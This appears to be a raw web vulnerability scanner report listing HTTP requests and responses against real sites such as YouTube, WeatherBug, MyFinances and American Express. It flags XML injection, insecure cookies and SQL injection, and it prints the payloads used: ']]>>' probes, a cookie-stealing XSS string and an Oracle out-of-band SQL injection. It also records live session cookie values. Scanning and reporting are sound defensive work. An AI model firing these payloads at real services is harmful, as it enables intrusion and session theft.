GET /yt/cssbin/www-embed-vflPrzZNL.css]]>> HTTP/1.1 Host: s.ytimg.com Proxy-Connection: keep-alive Referer: http://www.youtube.com/embed/aP2pdXfgWzM?rel=0 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Thu, 03 Feb 2011 16:24:18 GMT Server: lighttpd-yt/1.4.18
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /yt/jsbin]]>>/www-embed-vfl4nNnFQ.js HTTP/1.1 Host: s.ytimg.com Proxy-Connection: keep-alive Referer: http://www.youtube.com/embed/aP2pdXfgWzM?rel=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Cache-Control: public, max-age=31104000 Expires: Sun, 26 Dec 2032 06:12:01 GMT Content-Type: text/html Content-Length: 345 Date: Thu, 03 Feb 2011 16:24:20 GMT Server: lighttpd-yt/1.4.18
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /yt/jsbin/www-embed-vfl4nNnFQ.js]]>> HTTP/1.1 Host: s.ytimg.com Proxy-Connection: keep-alive Referer: http://www.youtube.com/embed/aP2pdXfgWzM?rel=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Thu, 03 Feb 2011 16:24:21 GMT Server: lighttpd-yt/1.4.18
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /tools]]>>/hcc.asp?callback=jsonp1296748868891&widgetId=2130113621124&widgetType=flash&hostUrl=http%3A%2F%2Fgsbmtg1-px.rtrk.com%2Fhome.html HTTP/1.1 Host: urlwww--feedzilla--com.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg1-px.rtrk.com/home.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319%26clk%3D1296748826%26dynamic_proxy%3D1%26primary_serv%3Dgsbmtg1-px.rtrk.com; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=retarget%3D0%26retarget_off%3D0%26track_landing_pages%3D1%26landing_loadtime_off%3D1; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7b45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 17:44:40 GMT Server: Microsoft-IIS/6.0 Set-Cookie: RlocalDYNPX=RLDYNPX%3Dwww.feedzilla.com; domain=.reachlocal.net; path=/ X-RL-Host: pweb108 X-Robots-Tag: noindex,nofollow Set-Cookie: RlocalPROXYLog=RLPROXYLog%3d1; domain=.rtrk.com; path=/ PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0)) X-Powered-By: ASP.NET Content-Type: text/html; Charset=iso-8859-1 Cache-control: private P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Set-Cookie: country=us;expires=Sat, 05-Mar-2011 17:44:40 GMT;path=/ Set-Cookie: ASPSESSIONIDQCDCDQCR=LBBJEDMACJOOEFNDAOEPBPEH;path=/ Vary: Accept-Encoding Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 18:13:32 GMT;path=/;httponly Content-Length: 26908
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /tools]]>>/swfobject.js HTTP/1.1 Host: urlwww--feedzilla--com.rtrk.com Proxy-Connection: keep-alive Referer: http://gsbmtg1-px.rtrk.com/home.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319%26clk%3D1296748826%26dynamic_proxy%3D1%26primary_serv%3Dgsbmtg1-px.rtrk.com; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 16:32:08 GMT Server: Microsoft-IIS/6.0 Set-Cookie: RlocalDYNPX=RLDYNPX%3Dwww.feedzilla.com; domain=.reachlocal.net; path=/ X-RL-Host: pweb104 X-Robots-Tag: noindex,nofollow PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l on "2008.05.01T19:01-0500" exp "2009.05.01T12:00-0500" r (l 0 s 0 v 0 o 0)) X-Powered-By: ASP.NET Content-Type: text/html; Charset=iso-8859-1 Cache-control: private P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Set-Cookie: country=us;expires=Sat, 05-Mar-2011 16:32:08 GMT;path=/ Set-Cookie: ASPSESSIONIDQCDCDQCR=GFEBEDMALANMGCGFKICELPGM;path=/ Vary: Accept-Encoding Set-Cookie: NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7945525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 17:00:50 GMT;path=/;httponly Content-Length: 27265
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.o ...[SNIP]...
The zip parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the zip parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /?zip=75201]]>>&zcode=6292 HTTP/1.1 Host: weather.weatherbug.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="NON DSP COR NID" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=UTF-8 Content-Length: 49365 Expires: Thu, 03 Feb 2011 16:34:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 16:34:33 GMT Connection: close Set-Cookie: wxbug_cookie1=lang_id=en-US&has_cookies=1; domain=weatherbug.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /solo]]>>?module=facebook/login&message_num=2 HTTP/1.1 Host: www.myfinances.com Proxy-Connection: keep-alive Referer: http://www.myfinances.com/budget.php?91d41%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3d8e0c43e90=1 X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ARPT=VRWOZXS192.168.100.27CKOUJ; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; adc=RSP
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 16:26:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 16:26:51 GMT Connection: close Vary: Accept-Encoding Set-Cookie: adc=RSP; path=/; Content-Length: 6533
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /solo]]>>/form/dispatcher HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:42 GMT Content-Length: 6490 Connection: close Set-Cookie: adc=RSP; path=/;
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /solo/form]]>>/dispatcher HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:53 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:53 GMT Content-Length: 6490 Connection: close Set-Cookie: adc=RSP; path=/;
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /solo/form/dispatcher]]>> HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:05:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:05:20 GMT Content-Length: 6490 Connection: close Set-Cookie: adc=RSP; path=/;
The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.
You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.
Issue remediation
The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.
GET /1/nat?id=94375989827&ref=&z=217634&purl=https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 HTTP/1.1 Accept: */* Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: app.insightgrit.com Connection: Keep-Alive Cache-Control: no-cache
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 18:59:42 GMT Server: Apache Location: https://app.insightgrit.com/Visit37.php?vt=V&id=94375989827&ref=&z=217634&purl=https://www.supermedia.com/spportal/spportalFlow.do%3f_flowExecutionKey=%2527%257C%257C(utl_inaddr.get_host_address((select+chr(95)%257C%257Cchr(33)%257C%257Cchr(64)%257C%257Cchr(51)%257C%257Cchr(100)%257C%257Cchr(105)%257C%257Cchr(108)%257C%257Cchr(101)%257C%257Cchr(109)%257C%257Cchr(109)%257C%257Cchr(97)+from+DUAL)))%257C%257C%2527 Content-Length: 614 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://app.insightgrit.com/Visit37.php?vt=V&am ...[SNIP]...
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: 220marketing9-px.rtrk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Visit37.php?vt=V&id=94375989827&ref=&z=217634&purl=https://www.supermedia.com/spportal/spportalFlow.do%3f_flowExecutionKey=%2527%257C%257C(utl_inaddr.get_host_address((select+chr(95)%257C%257Cchr(33)%257C%257Cchr(64)%257C%257Cchr(51)%257C%257Cchr(100)%257C%257Cchr(105)%257C%257Cchr(108)%257C%257Cchr(101)%257C%257Cchr(109)%257C%257Cchr(109)%257C%257Cchr(97)+from+DUAL)))%257C%257C%2527 HTTP/1.1 Accept: */* Referer: https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=%27%7C%7C(utl_inaddr.get_host_address((select+chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(51)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97)+from+DUAL)))%7C%7C%27 Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: app.insightgrit.com Connection: Keep-Alive Cache-Control: no-cache
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:59:37 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 03 Feb 2011 18:59:37 GMT Cache-Control: no-cache Pragma: no-cache Set-Cookie: PHPSESSID=f7173c41fd6dd0db660d473234eef682; path=/ Set-Cookie: IG94375=f7173c41fd6dd0db660d473234eef682; expires=Mon, 04-Apr-2011 18:59:37 GMT; domain=app.insightgrit.com p3p: policyref="w3c/p3policy.xml#tracking", CP="IDC DSP COR CUR DEVa TAIi IVAi IVDi CONi OUR STP ONL UNI PUR INT" Content-Length: 49 Connection: close Content-Type: image/gif
The following cookie was issued by the application and does not have the secure flag set:
sessionId=nullCookie; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cib/CEBMainServlet/Login?FIORG=330&FIFID=124085066 HTTP/1.1 Host: cibng.ibanking-services.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 13:44:22 GMT Server: IBM_HTTP_Server Pragma: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-Cache Set-Cookie: wf=wf Set-Cookie: sessionId=nullCookie; Path=/ Connection: close Content-Type: text/html;charset=UTF-8 Content-Language: en Content-Length: 9003
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <title>Personal Savings from American Express : Welcome to Personal Savings from American ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: icapture.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mwssignup/ HTTP/1.1 Host: mappoint-css.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:06:17 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: ASP.NET_SessionId=ygweoz45fmxyoqio3eycxw55; path=/; HttpOnly Cache-Control: private Expires: Thu, 03 Feb 2011 19:06:17 GMT Content-Type: text/html; charset=utf-8 Content-Length: 6559
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /upmb/disp HTTP/1.1 Host: mymortgage.regionsmortgage.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/fuidfyp/us/action?request_type=un_fuid&Face=en_US&entry_point=lnk_fuid&ReqSource=https%3A%2F%2Fonline.americanexpress.com%2Fmyca%2Facctsumm%2Fus%2Faction%3Frequest_type%3Dauthreg_acctAccountSummary%26us_nu%3Dlogincontrol%26inav%3Dmenu_acct_summary HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d0f645525d5f4f58455e445a4a42861c; sroute=655231498.58148.0000; SaneID=173.193.214.243-1296742163652146; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1ab45525d5f4f58455e445a4a42be89;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/logon/us/action HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /myca/ocareg/us/action?request_type=un_Register&Face=en_US&DestPage=https%3A%2F%2Fonline.americanexpress.com%2Fmyca%2Facctsumm%2Fus%2Faction%3Frequest_type%3Dauthreg_acctAccountSummary%26us_nu%3Dlogincontrol%26inav%3Dmenu_acct_summary HTTP/1.1 Host: online.americanexpress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d0f645525d5f4f58455e445a4a42861c; sroute=655231498.58148.0000; SaneID=173.193.214.243-1296742163652146; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1ab45525d5f4f58455e445a4a42be89;
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: onlineimagelockbox.regions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /RegSysProfileCenter/default.aspx?lcid=1033 HTTP/1.1 Host: profile.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
